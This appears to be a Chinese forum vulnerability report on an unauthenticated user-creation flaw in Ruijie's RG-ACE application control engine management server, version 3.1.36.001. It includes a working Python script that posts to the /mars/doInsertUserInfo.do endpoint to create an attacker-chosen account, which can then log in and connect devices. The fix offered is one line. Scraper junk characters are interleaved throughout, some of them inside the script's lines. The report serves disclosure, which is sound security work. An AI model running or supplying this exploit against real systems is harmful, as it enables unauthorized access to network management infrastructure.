锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）

3 d) R# O4 E* F7 [  g$ p7 q
4 O6 ?2 Y- O% c4 }- {1 ]测试的具体版本是
; u. k# N  j7 ~- c1 ]产品名称: 锐捷应用控制引擎
' T8 C* o5 H0 j7 o0 b版本号: 3.1.36.001 TC
. V" w5 M+ W0 y6 r编译时间: 201104291730


漏洞证明：



: K( [: Q! K) w0 M5 t1 ]& k$ P
2 t& U& J8 n+ K1 X6 V+ X( K

执行脚本
#! /usr/bin/env python
1 Q0 ^3 F  @# H  w: Y0 H#coding=gbk
( \2 l2 G- Y# d+ C- A. a#RG-ACE管理服务器 V3.1.36.001
import urllib2, urllib,cookielib
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
post=(("event","userManager.doInsertUserInfo"),
  D) x- j6 M4 N( g9 M3 l("useractionname","addButtonValue"),
# ^& D  D2 `# R: C("useropermanager","userManager"),
("userName","t"), #######账号自己加
("pwd","aaaaaa"),######密码自己加
# v- s( Q4 Q+ c) H3 G4 w5 y% x: L("trueName","ad"),
: J4 V* a* Y& ~+ U7 v("email",""),
("mobilePhone",""),
" F7 F. N5 G! @4 S- g! a("officePhone",""),
("addr",""),
("submit","确定"))
: I8 @3 r2 Y+ }5 Wurllib2.install_opener(opener)
6 d( E/ h) ?9 I0 p5 d2 fp=urllib2.urlopen(url, urllib.urlencode(post)).read()
print "Done"

& q2 D3 D$ m+ T3 a9 @" X4 |; z" x登录，连接设备
( P- [# W- Y/ o: E8 s5 p
$ D2 B1 a5 \1 ]* R: {; d
7 b! J0 c9 L* `& L. d# o
; W( D. {; p& ?9 I9 O6 f) |
8 F" C* }0 C" @& }, ^9 W6 w
/ P& R' Q5 D# f0 b! w& r默认的管理员admin权限更大点

0 G( u8 p; x7 W# R5 N. y0 T


% @" ?; \9 r0 M/ G) M
3 {2 E6 ~( I' Z修复方案：
加强对接口的权限验证

: r+ p. m: N1 }/ R) j! e